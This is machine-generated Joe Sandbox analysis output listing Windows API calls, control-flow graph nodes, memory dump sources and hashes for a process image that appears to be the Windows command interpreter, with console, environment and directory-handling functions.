                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520589
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D152059E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D15205C5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D1520605
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520632
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D1520647
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7D1524E35), ref: 00007FF7D15255DA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525623
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525667
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D15256BE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525702
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E81
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F69
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525037
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152504B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250F2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152510F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525130
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152514A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525175
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c24d3ad9e99063f81465f73adbbd424b272087df19e895f3499b647153850e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12C16B62A18A4B86FB04BB11E8141BDF7A1FF89B91FD48176D94F433B1DFBCA4458260
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 732 7ff7d1523c24-7ff7d1523c61 733 7ff7d152ec5a-7ff7d152ec5f 732->733 734 7ff7d1523c67-7ff7d1523c99 call 7ff7d151af14 call 7ff7d151ca40 732->734 733->734 736 7ff7d152ec65-7ff7d152ec6a 733->736 743 7ff7d152ec97-7ff7d152eca1 call 7ff7d152855c 734->743 744 7ff7d1523c9f-7ff7d1523cb2 call 7ff7d151b900 734->744 738 7ff7d152412e-7ff7d152415b call 7ff7d1528f80 736->738 744->743 749 7ff7d1523cb8-7ff7d1523cbc 744->749 750 7ff7d1523cbf-7ff7d1523cc7 749->750 750->750 751 7ff7d1523cc9-7ff7d1523ccd 750->751 752 7ff7d1523cd2-7ff7d1523cd8 751->752 753 7ff7d1523cda-7ff7d1523cdf 752->753 754 7ff7d1523ce5-7ff7d1523d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff7d1523faa-7ff7d1523fb3 753->755 756 7ff7d1523fb8 754->756 757 7ff7d1523d68-7ff7d1523d6c 754->757 755->752 759 7ff7d1523fc6-7ff7d1523fec GetLastError call 7ff7d152855c call 7ff7d152a5d6 756->759 757->756 758 7ff7d1523d72-7ff7d1523dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7d1523dd3-7ff7d1523ddd 758->760 762 7ff7d1523ff1-7ff7d1524007 call 7ff7d152855c _local_unwind 759->762 760->762 763 7ff7d1523de3-7ff7d1523dfb 760->763 773 7ff7d152400c-7ff7d1524022 GetLastError 762->773 765 7ff7d15240fe-7ff7d1524119 call 7ff7d152855c _local_unwind 763->765 766 7ff7d1523e01-7ff7d1523e11 763->766 775 7ff7d152411a-7ff7d152412c call 7ff7d151ff70 call 7ff7d152855c 765->775 766->765 769 7ff7d1523e17-7ff7d1523e28 766->769 772 7ff7d1523e2c-7ff7d1523e34 769->772 772->772 776 7ff7d1523e36-7ff7d1523e3f 772->776 777 7ff7d1524028-7ff7d152402b 773->777 778 7ff7d1523e95-7ff7d1523e9c 773->778 775->738 780 7ff7d1523e42-7ff7d1523e55 776->780 777->778 781 7ff7d1524031-7ff7d1524047 call 7ff7d152855c _local_unwind 777->781 782 7ff7d1523e9e-7ff7d1523ec2 call 7ff7d1522978 778->782 783 7ff7d1523ecf-7ff7d1523ed3 778->783 787 7ff7d1523e57-7ff7d1523e60 780->787 788 7ff7d1523e66-7ff7d1523e8f GetFileAttributesW 780->788 799 7ff7d152404c-7ff7d1524062 call 7ff7d152855c _local_unwind 781->799 791 7ff7d1523ec7-7ff7d1523ec9 782->791 785 7ff7d1523f08-7ff7d1523f0b 783->785 786 7ff7d1523ed5-7ff7d1523ef7 GetFileAttributesW 783->786 795 7ff7d1523f1e-7ff7d1523f40 SetCurrentDirectoryW 785->795 796 7ff7d1523f0d-7ff7d1523f11 785->796 793 7ff7d1524067-7ff7d1524098 GetLastError call 7ff7d152855c _local_unwind 786->793 794 7ff7d1523efd-7ff7d1523f02 786->794 787->788 797 7ff7d1523f9d-7ff7d1523fa5 787->797 788->773 788->778 791->783 791->799 802 7ff7d152409d-7ff7d15240b3 call 7ff7d152855c _local_unwind 793->802 794->785 794->802 804 7ff7d1523f46-7ff7d1523f69 call 7ff7d152498c 795->804 805 7ff7d15240b8-7ff7d15240de GetLastError call 7ff7d152855c _local_unwind 795->805 803 7ff7d1523f13-7ff7d1523f1c 796->803 796->804 797->780 799->793 802->805 803->795 803->804 815 7ff7d15240e3-7ff7d15240f9 call 7ff7d152855c _local_unwind 804->815 816 7ff7d1523f6f-7ff7d1523f98 call 7ff7d152417c 804->816 805->815 815->765 816->775
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1809961153-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 734ef4eb37dd310d376e711d0a2030d3fc9247bb3473ba6da7b1b02340b469a4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25D11A23708B8A91FB60AB15E4442AEB7A1FB89740FC44176DA4F836B5DFBCE544C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 914 7ff7d1522394-7ff7d1522416 memset call 7ff7d151ca40 917 7ff7d152241c-7ff7d1522453 GetModuleFileNameW call 7ff7d152081c 914->917 918 7ff7d152e0d2-7ff7d152e0da call 7ff7d1524c1c 914->918 923 7ff7d1522459-7ff7d1522468 call 7ff7d152081c 917->923 924 7ff7d152e0db-7ff7d152e0ee call 7ff7d152498c 917->924 918->924 929 7ff7d152246e-7ff7d152247d call 7ff7d152081c 923->929 930 7ff7d152e0f4-7ff7d152e107 call 7ff7d152498c 923->930 924->930 935 7ff7d1522483-7ff7d1522492 call 7ff7d152081c 929->935 936 7ff7d1522516-7ff7d1522529 call 7ff7d152498c 929->936 937 7ff7d152e10d-7ff7d152e123 930->937 935->937 947 7ff7d1522498-7ff7d15224a7 call 7ff7d152081c 935->947 936->935 940 7ff7d152e13f-7ff7d152e17a _wcsupr 937->940 941 7ff7d152e125-7ff7d152e139 wcschr 937->941 945 7ff7d152e17c-7ff7d152e17f 940->945 946 7ff7d152e181-7ff7d152e199 wcsrchr 940->946 941->940 944 7ff7d152e27c 941->944 949 7ff7d152e283-7ff7d152e29b call 7ff7d152498c 944->949 948 7ff7d152e19c 945->948 946->948 956 7ff7d15224ad-7ff7d15224c5 call 7ff7d1523c24 947->956 957 7ff7d152e2a1-7ff7d152e2c3 _wcsicmp 947->957 951 7ff7d152e1a0-7ff7d152e1a7 948->951 949->957 951->951 954 7ff7d152e1a9-7ff7d152e1bb 951->954 958 7ff7d152e1c1-7ff7d152e1e6 954->958 959 7ff7d152e264-7ff7d152e277 call 7ff7d1521300 954->959 961 7ff7d15224ca-7ff7d15224db 956->961 963 7ff7d152e21a 958->963 964 7ff7d152e1e8-7ff7d152e1f1 958->964 959->944 965 7ff7d15224e9-7ff7d1522514 call 7ff7d1528f80 961->965 966 7ff7d15224dd-7ff7d15224e4 ??_V@YAXPEAX@Z 961->966 967 7ff7d152e21d-7ff7d152e21f 963->967 968 7ff7d152e201-7ff7d152e210 964->968 969 7ff7d152e1f3-7ff7d152e1f6 964->969 966->965 967->949 972 7ff7d152e221-7ff7d152e228 967->972 968->963 970 7ff7d152e212-7ff7d152e218 968->970 969->968 973 7ff7d152e1f8-7ff7d152e1ff 969->973 970->967 975 7ff7d152e22a-7ff7d152e231 972->975 976 7ff7d152e254-7ff7d152e262 972->976 973->968 973->969 977 7ff7d152e234-7ff7d152e237 975->977 976->944 977->976 978 7ff7d152e239-7ff7d152e242 977->978 978->976 979 7ff7d152e244-7ff7d152e252 978->979 979->976 979->977
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2622545777-4197029667
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 990f5a80da7463dfb02d8ffe918508bb2ff50a7a53fd00350f8d5109df435baf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03915862B49A8B85FF24AB10D8502FCA3A1FF49B84FD44176C90F876B5DEBCE5158360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1520580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 29b71c908c8d31d66ee902027ca77db465c7e9ac89c9aee9236c1acaf79c43e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541DC75A0961B8BF7546B15E8542BCBAB0BF89751FD49276D90F82370DFBCA4048620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
